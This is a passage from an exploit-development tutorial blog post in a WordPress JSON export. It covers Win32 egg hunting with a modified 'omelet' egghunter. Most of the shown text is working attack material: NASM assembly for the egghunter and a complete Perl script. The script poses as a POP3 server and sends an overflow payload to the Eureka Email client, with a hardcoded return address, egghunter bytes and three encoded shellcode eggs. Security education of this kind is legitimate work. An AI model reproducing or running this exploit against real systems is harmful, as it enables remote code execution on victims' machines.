Since the eggs are in the right order in memory, perhaps a slight modification of the omelet code may make it work. What if we use one of the registers to keep track of the remaining number of eggs to find, and make the code jump to the shellcode when this register indicates that all eggs have been found.<\/p>\n
Let\u2019s give it a try (Although I\u2019m not a big asm expert, I\u2019m feeling lucky today \ud83d\ude42 )<\/p>\n
We need to start the omelet code with creating a start value that will be used to count the number of eggs found : 0 - the number of eggs or 0xFFFFFFFF - number of eggs + 1\u00a0 (so if we have 3 eggs, we\u2019ll use FFFFFFFD). After looking at the omelet code (in the debugger), I\u2019ve noticed that EBX is not used, so we\u2019ll store this value in EBX.<\/p>\n
Next, what I\u2019ll make the omelet code do is this : each time an egg is found, increment this value with one.\u00a0 When the value is FFFFFFFF, all eggs have been found, so we can make the jump.<\/p>\n
Opcode for putting 0xFFFFFFFD in EBX is \\xbb\\xfd\\xff\\xff\\xff. So we\u2019ll need to start the omelet code with this instruction.<\/p>\n
Then, after the shellcode from a given egg is copied to the stack, we\u2019ll need to verify if we have seen all the eggs or not. (so we\u2019ll compare EBX with FFFFFFFF. If they are the same, we can jump to the shellcode. If not, increment EBX.) Copying the shellcode to the stack is performed via the following instruction :\u00a0 F3:A4, so the check and increment must be placed right after.<\/p>\n
\"image\"<\/a><\/p>\n
Right after this instruction, we\u2019ll insert the compare, jump if equal, and \u201cINC EBX\u201d\u00a0 (\\x43)<\/p>\n
Let\u2019s modify the master asm code :<\/p>\n
BITS 32\n\n; egg:\n; LL II M1 M2 M3 DD DD DD ... (LL * DD)\n; LL == Size of eggs (same for all eggs)\n; II == Index of egg (different for each egg)\n; M1,M2,M3 == Marker byte (same for all eggs)\n; DD == Data in egg (different for each egg)\n\n; Original code by skylined\n; Code tweaked by Peter Van Eeckhoutte\n; peter.ve[at]corelan.be\n; https:\/\/www.corelan.be\n\nmarker equ 0x280876\negg_size equ 0x3\nmax_index equ 0x2\nstart:\n mov ebx,0xffffffff-egg_size+1 ; ** Added : put initial counter in EBX<\/span><\/strong>\n  jmp     SHORT reset_stack\n\ncreate_SEH_handler:\n  PUSH    ECX                     ; SEH_frames[0].nextframe == 0xFFFFFFFF\n  MOV     [FS:EAX], ESP           ; SEH_chain -> SEH_frames[0]\n  CLD                             ; SCAN memory upwards from 0\nscan_loop:\n  MOV     AL, egg_size            ; EAX = egg_size\negg_size_location equ $-1 - $$\n  REPNE   SCASB                   ; Find the first byte\n  PUSH    EAX                     ; Save egg_size\n  MOV     ESI, EDI\n  LODSD                           ; EAX = II M2 M3 M4\n  XOR     EAX, (marker <<\/span><<\/span> 8) + 0xFF  ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4)\n\t                             ;    == egg_index\nmarker_bytes_location equ $-3 - $$\n  CMP     EAX, BYTE max_index     ; Check if the value of EDX is <<\/span> max_index\nmax_index_location equ $-1 - $$\n  JA      reset_stack             ; No -><\/span> This was not a marker, continue scan\n  POP     ECX                     ; ECX = egg_size\n  IMUL    ECX                     ; EAX = egg_size * egg_index == egg_offset\n  ; EDX = 0 because ECX * EAX is always less than 0x1,000,000\n  ADD     EAX, [BYTE FS:EDX + 8]   ; EDI += Bottom of stack ==\n\t                            ;      position of egg in shellcode.\n  XCHG    EAX, EDI\ncopy_loop:\n  REP     MOVSB                   ; copy egg to basket\n CMP EBX, 0xFFFFFFFF ; ** Added : see if we have found all eggs JE done ; ** Added : If we have found all eggs, ; ** jump to shellcode INC EBX ; ** Added : increment EBX ; (if we are not at the end of the eggs)<\/span><\/strong>\n  MOV     EDI, ESI                ; EDI = end of egg\n\nreset_stack:\n; Reset the stack to prevent problems cause by recursive SEH handlers and set\n; ourselves up to handle and AVs we may cause by scanning memory:\n  XOR     EAX, EAX                ; EAX = 0\n  MOV     ECX, [FS:EAX]           ; EBX = SEH_chain => SEH_frames[X]\nfind_last_SEH_loop:\n  MOV     ESP, ECX                ; ESP = SEH_frames[X]\n  POP     ECX                     ; EBX = SEH_frames[X].next_frame\n  CMP     ECX, 0xFFFFFFFF         ; SEH_frames[X].next_frame == none ?\n  JNE     find_last_SEH_loop      ; No \"X -= 1\", check next frame\n  POP     EDX                     ; EDX = SEH_frames[0].handler\n  CALL    create_SEH_handler      ; SEH_frames[0].handler == SEH_handler\n\nSEH_handler:\n  POPA                            ; ESI = [ESP + 4] ->\n                                  ;     struct exception_info\n  LEA     ESP, [BYTE ESI+0x18]    ; ESP = struct exception_info->exception_addr\n  POP     EAX                     ; EAX = exception address 0x????????\n  OR      AX, 0xFFF               ; EAX = 0x?????FFF\n  INC     EAX                     ; EAX = 0x?????FFF + 1 -> next page\n  JS      done                    ; EAX > 0x7FFFFFFF ===> done\n  XCHG    EAX, EDI                ; EDI => next page\n  JMP     reset_stack\ndone:\n  XOR     EAX, EAX                ; EAX = 0\n  CALL    [BYTE FS:EAX + 8]       ; EDI += Bottom of stack\n                                  ;    == position of egg in shellcode.\n\n    db      marker_bytes_location\n    db      max_index_location\n    db      egg_size_location<\/pre>\n
You can download the tweaked code here :<\/p>\n
[download id=55]55[\/download]<\/p>\n
Compile this modified code again, and recreate the eggs :<\/p>\n
\"c:\\program files\\nasm\\nasm.exe\" -f bin -o w32_omelet.bin w32_SEH_corelanc0d3r_omelet.asm -w+error <\/em><\/p>\n
w32_SEH_omelet.py w32_omelet.bin shellcode.bin calceggs.txt 127 0xBADA55<\/em><\/p>\n
Copy the omelet code from the newly created calceggs.txt file and put it in the exploit.<\/p>\n
Exploit now looks like this :<\/p>\n
use<\/span> Socket;\n#fill out the local<\/span> IP or hostname\n#which is used by Eureka EMail as POP<\/span>3 server\n#note : must be exact match !\nmy<\/span> $localserver = \"192.168.0.193<\/span>\";\n#calculate offset<\/span> to EIP\nmy<\/span> $junk = \"A<\/span>\" x (723 - length<\/span>($localserver));\nmy<\/span> $ret=pack<\/span>('V',0x7E47BCAF); #jmp esp from user32.dll\nmy<\/span> $padding = \"\\x90<\/span>\" x 1000;\n\nmy<\/span> $omelet_code = \"\\xbb\\xfd\\xff\\xff\\xff<\/span>\".   #put 0xfffffffd in ebx\n\"\\xEB\\x2C\\x51\\x64\\x89\\x20\\xFC\\xB0\\x7A\\xF2\\xAE\\x50<\/span>\".\n\"\\x89\\xFE\\xAD\\x35\\xFF\\x55\\xDA\\xBA\\x83\\xF8\\x03\\x77<\/span>\".\n\"\\x15\\x59\\xF7\\xE9\\x64\\x03\\x42\\x08\\x97\\xF3\\xA4<\/span>\".\n\"\\x81\\xFB\\xFF\\xFF\\xFF\\xFF<\/span>\".   # compare EBX with FFFFFFFF\n\"\\x74\\x2B<\/span>\".   #if<\/span> EBX is FFFFFFFF, jump to shellcode\n\"\\x43<\/span>\".       #if<\/span> not, increase EBX and continue<\/span>\n\"\\x89\\xF7\\x31\\xC0\\x64\\x8B\\x08\\x89\\xCC\\x59\\x81\\xF9<\/span>\".\n\"\\xFF\\xFF\\xFF\\xFF\\x75\\xF5\\x5A\\xE8\\xBE\\xFF\\xFF\\xFF<\/span>\".\n\"\\x61\\x8D\\x66\\x18\\x58\\x66\\x0D\\xFF\\x0F\\x40\\x78\\x06<\/span>\".\n\"\\x97\\xE9\\xD8\\xFF\\xFF\\xFF\\x31\\xC0\\x64\\xFF\\x50\\x08<\/span>\";\n\nmy<\/span> $egg1 = \"\\x7A\\xFF\\x55\\xDA\\xBA\\x89\\xE2\\xDA\\xC1\\xD9\\x72\\xF4\\x58\\x50<\/span>\".\n\"\\x59\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5A\\x56\\x54\\x58\\x33<\/span>\".\n\"\\x30\\x56\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\\x42<\/span>\".\n\"\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x58<\/span>\".\n\"\\x50\\x38\\x41\\x43\\x4A\\x4A\\x49\\x4B\\x4C\\x4A\\x48\\x50\\x44\\x43\\x30\\x43\\x30<\/span>\".\n\"\\x45\\x50\\x4C\\x4B\\x47\\x35\\x47\\x4C\\x4C\\x4B\\x43\\x4C\\x43\\x35\\x43\\x48\\x45<\/span>\".\n\"\\x51\\x4A\\x4F\\x4C\\x4B\\x50\\x4F\\x42\\x38\\x4C\\x4B\\x51\\x4F\\x47\\x50\\x43\\x31<\/span>\".\n\"\\x4A\\x4B\\x51\\x59\\x4C\\x4B\\x46\\x54\\x4C\\x4B\\x43<\/span>\";\n\nmy<\/span> $egg2 = \"\\x7A\\xFE\\x55\\xDA\\xBA\\x31\\x4A\\x4E\\x50\\x31\\x49\\x50\\x4C\\x59<\/span>\".\n\"\\x4E\\x4C\\x4C\\x44\\x49\\x50\\x43\\x44\\x43\\x37\\x49\\x51\\x49\\x5A\\x44\\x4D\\x43<\/span>\".\n\"\\x31\\x49\\x52\\x4A\\x4B\\x4A\\x54\\x47\\x4B\\x51\\x44\\x46\\x44\\x43\\x34\\x42\\x55<\/span>\".\n\"\\x4B\\x55\\x4C\\x4B\\x51\\x4F\\x51\\x34\\x45\\x51\\x4A\\x4B\\x42\\x46\\x4C\\x4B\\x44<\/span>\".\n\"\\x4C\\x50\\x4B\\x4C\\x4B\\x51\\x4F\\x45\\x4C\\x45\\x51\\x4A\\x4B\\x4C\\x4B\\x45\\x4C<\/span>\".\n\"\\x4C\\x4B\\x45\\x51\\x4A\\x4B\\x4D\\x59\\x51\\x4C\\x47\\x54\\x43\\x34\\x48\\x43\\x51<\/span>\".\n\"\\x4F\\x46\\x51\\x4B\\x46\\x43\\x50\\x50\\x56\\x45\\x34\\x4C\\x4B\\x47\\x36\\x50\\x30<\/span>\".\n\"\\x4C\\x4B\\x51\\x50\\x44\\x4C\\x4C\\x4B\\x44\\x30\\x45<\/span>\";\n\nmy<\/span> $egg3 = \"\\x7A\\xFD\\x55\\xDA\\xBA\\x4C\\x4E\\x4D\\x4C\\x4B\\x45\\x38\\x43\\x38<\/span>\".\n\"\\x4B\\x39\\x4A\\x58\\x4C\\x43\\x49\\x50\\x42\\x4A\\x50\\x50\\x42\\x48\\x4C\\x30\\x4D<\/span>\".\n\"\\x5A\\x43\\x34\\x51\\x4F\\x45\\x38\\x4A\\x38\\x4B\\x4E\\x4D\\x5A\\x44\\x4E\\x46\\x37<\/span>\".\n\"\\x4B\\x4F\\x4D\\x37\\x42\\x43\\x45\\x31\\x42\\x4C\\x42\\x43\\x45\\x50\\x41\\x41\\x40<\/span>\".\n\"\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40<\/span>\".\n\"\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40<\/span>\".\n\"\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40<\/span>\".\n\"\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40\\x40<\/span>\";\n\nmy<\/span> $garbage=\"This is a bunch of garbage<\/span>\" x 10;\n\nmy<\/span> $payload=$junk.$ret.$omelet_code.$padding.$egg1.$garbage.$egg2.$garbage.$egg3;\n\nprint<\/span> \"Payload : <\/span>\" . length<\/span>($payload).\" bytes\\n<\/span>\";\nprint<\/span> \"Omelet code : <\/span>\" . length<\/span>($omelet_code).\" bytes\\n<\/span>\";\nprint<\/span> \" Egg 1 : <\/span>\" . length<\/span>($egg1).\" bytes\\n<\/span>\";\nprint<\/span> \" Egg 2 : <\/span>\" . length<\/span>($egg2).\" bytes\\n<\/span>\";\nprint<\/span> \" Egg 3 : <\/span>\" . length<\/span>($egg3).\" bytes\\n<\/span>\";\n\n#set up listener on port 110\nmy<\/span> $port=110;\nmy<\/span> $proto=getprotobyname<\/span>('tcp');\nsocket<\/span>(SERVER,PF_INET,SOCK_STREAM,$proto);\nmy<\/span> $paddr=sockaddr_in($port,INADDR_ANY);\nbind<\/span>(SERVER,$paddr);\nlisten<\/span>(SERVER,SOMAXCONN);\nprint<\/span> \"[+] Listening on tcp port 110 [POP3]... \\n<\/span>\";\nprint<\/span> \"[+] Configure Eureka Mail Client to connect to this host \\n<\/span>\";\nmy<\/span> $client_addr;\nwhile($client_addr=accept<\/span>(CLIENT,SERVER))\n{\n  print<\/span> \"[+] Client connected, sending evil payload\\n<\/span>\";\n  $cnt=1;\n  while($cnt < 10)\n  {\n     print<\/span> CLIENT \"-ERR <\/span>\".$payload.\"\\n<\/span>\";\n\t print<\/span> \" -> Sent <\/span>\".length<\/span>($payload).\" bytes\\n<\/span>\";\n\t $cnt=$cnt+1;\n  }\n}\nclose<\/span> CLIENT;\nprint<\/span> \"[+] Connection closed\\n<\/span>\";<\/pre>\n
Ok, the omelet code is slightly larger, and my changes could perhaps be improved a little, but hey:\u00a0 look at the result :<\/p>\n
\"image\"<\/a><\/p>\n
pwned ! \ud83d\ude42<\/p>\n
 <\/p>\n
 <\/p>\n
Training<\/h3>\n
This exploit writing series are accessible for free, and may have helped certain people one way or another in their quest to learning about windows exploitation.\u00a0 Reading manuals and tutorials are a good start, but sometimes it\u2019s better to get things explained by experts, 101, during some sort of class or training.<\/p>\n
If you are interested in getting some class based training, check out https:\/\/www.corelan-training.com<\/p>\n
 <\/p>\n
All my thanks are belong to you :<\/h3>\n
My friends @ Corelan Team\u00a0 (Ricardo, EdiStrosar, mr_me, ekse, MarkoT, sinn3r, Jacky\u00a0 : you guys r0ck ! ) ,<\/p>\n
Berend-Jan Wever (a.k.a. SkyLined), for writing some great stuff,<\/p>\n
and thanks to everyone taking the time to read this stuff, provide feedback, and help others on my forum<\/a>.<\/p>\n
Also, cheers to some other nice people I met on Twitter\/IRC over the last couple of months. (curtw<\/a>, Trancer00t<\/a>, mubix<\/a>, psifertex<\/a>, pusscat<\/a>, hdm<\/a>, FX<\/a>, NCR\/CRC! [ReVeRsEr], Bernardo Damele<\/a>, Shahin Ramezany<\/a>, muts<\/a>, nullthreat, etc\u2026 )<\/p>\n
To some of the people I have listed here : Big thanks for responding to my questions or comments (it means a lot to me), and\/or reviewing the tutorial drafts\u2026<\/p>\n
Finally : thanks to anyone who showed interest in my work, tweeted about it, retweeted messages or simply expressed their appreciation in various mailinglists and forums.\u00a0 Spread the word & make my day !<\/p>\n
Remember : Life is not about what you know, but about the will to listen, learn, share & teach.<\/p>\n
 <\/p>\n
Terms of Use applicable to this document : https:\/\/www.corelan.be\/index.php\/terms-of-use\/<\/a><\/p>\n
\"\"\u00a0\u00a0Copyright secured by Digiprove\u00a0\u00a9 2010 Peter Van Eeckhoutte<\/span><\/a><\/span><\/p>\n","protected":false},"excerpt":{"rendered":"
Introduction Easter is still far away, so this is probably the right time to talk about ways to hunting for eggs (so you would be prepared when the easter bunny brings you another 0day vulnerability) In the first parts of this exploit writing tutorial series, we have talked about stack based overflows and how they … Continue reading \"Exploit writing tutorial part 8 : Win32 Egg Hunting\"<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[244,245,127],"tags":[3736,3733,2786,2128,2096,2083,1977,1865,1834,1824,1817],"class_list":["post-2677","post","type-post","status-publish","format-standard","hentry","category-exploit-writing-tutorials","category-exploits","category-security","tag-encoder-decoder","tag-exploit-development-tutorial","tag-egghunter","tag-immunity-debugger","tag-alphanumeric","tag-unicode","tag-pvefindaddr","tag-seh","tag-shellcode","tag-metasploit","tag-eip"],"yoast_head":"\nExploit writing tutorial part 8 : Win32 Egg Hunting - Corelan | Exploit Development & Vulnerability Research<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Exploit writing tutorial part 8 : Win32 Egg Hunting - Corelan | Exploit Development & Vulnerability Research\" \/>\n<meta property=\"og:description\" content=\"Introduction Easter is still far away, so this is probably the right time to talk about ways to hunting for eggs (so you would be prepared when the easter bunny brings you another 0day vulnerability) In the first parts of this exploit writing tutorial series, we have talked about stack based overflows and how they … Continue reading "Exploit writing tutorial part 8 : Win32 Egg Hunting"\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/\" \/>\n<meta property=\"og:site_name\" content=\"Corelan | Exploit Development & Vulnerability Research\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/corelanconsulting\" \/>\n<meta property=\"article:published_time\" content=\"2010-01-09T18:57:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb30.png\" \/>\n<meta name=\"author\" content=\"corelanc0d3r\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@corelanc0d3r\" \/>\n<meta name=\"twitter:site\" content=\"@corelanc0d3r\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"TechArticle\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/\"},\"author\":{\"name\":\"corelanc0d3r\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/person\\\/3be5542b9b0a0787893db83a5ad68e8f\"},\"headline\":\"Exploit writing tutorial part 8 : Win32 Egg Hunting\",\"datePublished\":\"2010-01-09T18:57:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/\"},\"wordCount\":10532,\"publisher\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2010\\\/01\\\/image_thumb30.png\",\"keywords\":[\"encoder decoder\",\"exploit development tutorial\",\"egghunter\",\"immunity debugger\",\"alphanumeric\",\"unicode\",\"pvefindaddr\",\"seh\",\"shellcode\",\"metasploit\",\"eip\"],\"articleSection\":[\"Exploit Writing Tutorials\",\"Exploits\",\"Security\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/\",\"name\":\"Exploit writing tutorial part 8 : Win32 Egg Hunting - Corelan | Exploit Development & Vulnerability Research\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2010\\\/01\\\/image_thumb30.png\",\"datePublished\":\"2010-01-09T18:57:00+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2010\\\/01\\\/image_thumb30.png\",\"contentUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2010\\\/01\\\/image_thumb30.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2010\\\/01\\\/09\\\/exploit-writing-tutorial-part-8-win32-egg-hunting\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.corelan.be\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Exploit writing tutorial part 8 : Win32 Egg Hunting\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"name\":\"Corelan CyberSecurity Research\",\"description\":\"Corelan publishes in-depth tutorials on exploit development, Windows exploitation, vulnerability research, heap internals, reverse engineering and security tooling used by professionals worldwide.\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.corelan.be\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\",\"name\":\"Corelan CyberSecurity Research\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"contentUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"width\":200,\"height\":200,\"caption\":\"Corelan CyberSecurity Research\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/corelanconsulting\",\"https:\\\/\\\/x.com\\\/corelanc0d3r\",\"https:\\\/\\\/x.com\\\/corelanconsulting\",\"https:\\\/\\\/instagram.com\\\/corelanconsult\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/person\\\/3be5542b9b0a0787893db83a5ad68e8f\",\"name\":\"corelanc0d3r\",\"pronouns\":\"he\\\/him\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"caption\":\"corelanc0d3r\"},\"description\":\"Peter Van Eeckhoutte is the founder of Corelan and a globally recognized expert in exploit development and vulnerability research. With over two decades in IT security, he built Corelan into a respected platform for deep technical research, hands-on training, and knowledge sharing. Known for his influential exploit development tutorials, tools, and real-world training, Peter combines a strong research mindset with a passion for education\u2014helping security professionals understand not just how exploits work, but why.\",\"sameAs\":[\"https:\\\/\\\/www.corelan-training.com\",\"https:\\\/\\\/instagram.com\\\/corelanc0d3r\",\"https:\\\/\\\/www.linkedin.com\\\/in\\\/petervaneeckhoutte\\\/\",\"https:\\\/\\\/x.com\\\/corelanc0d3r\"],\"url\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/author\\\/admin0\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Exploit writing tutorial part 8 : Win32 Egg Hunting - Corelan | Exploit Development & Vulnerability Research","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/","og_locale":"en_US","og_type":"article","og_title":"Exploit writing tutorial part 8 : Win32 Egg Hunting - Corelan | Exploit Development & Vulnerability Research","og_description":"Introduction Easter is still far away, so this is probably the right time to talk about ways to hunting for eggs (so you would be prepared when the easter bunny brings you another 0day vulnerability) In the first parts of this exploit writing tutorial series, we have talked about stack based overflows and how they … Continue reading \"Exploit writing tutorial part 8 : Win32 Egg Hunting\"","og_url":"https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/","og_site_name":"Corelan | Exploit Development & Vulnerability Research","article_publisher":"https:\/\/www.facebook.com\/corelanconsulting","article_published_time":"2010-01-09T18:57:00+00:00","og_image":[{"url":"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb30.png","type":"","width":"","height":""}],"author":"corelanc0d3r","twitter_card":"summary_large_image","twitter_creator":"@corelanc0d3r","twitter_site":"@corelanc0d3r","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"TechArticle","@id":"https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/#article","isPartOf":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/"},"author":{"name":"corelanc0d3r","@id":"https:\/\/www.corelan.be\/#\/schema\/person\/3be5542b9b0a0787893db83a5ad68e8f"},"headline":"Exploit writing tutorial part 8 : Win32 Egg Hunting","datePublished":"2010-01-09T18:57:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/"},"wordCount":10532,"publisher":{"@id":"https:\/\/www.corelan.be\/#organization"},"image":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/#primaryimage"},"thumbnailUrl":"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb30.png","keywords":["encoder decoder","exploit development tutorial","egghunter","immunity debugger","alphanumeric","unicode","pvefindaddr","seh","shellcode","metasploit","eip"],"articleSection":["Exploit Writing Tutorials","Exploits","Security"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/","url":"https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/","name":"Exploit writing tutorial part 8 : Win32 Egg Hunting - Corelan | Exploit Development & Vulnerability Research","isPartOf":{"@id":"https:\/\/www.corelan.be\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/#primaryimage"},"image":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/#primaryimage"},"thumbnailUrl":"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb30.png","datePublished":"2010-01-09T18:57:00+00:00","breadcrumb":{"@id":"https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/#primaryimage","url":"https:\/\/www.corelan.be\/wp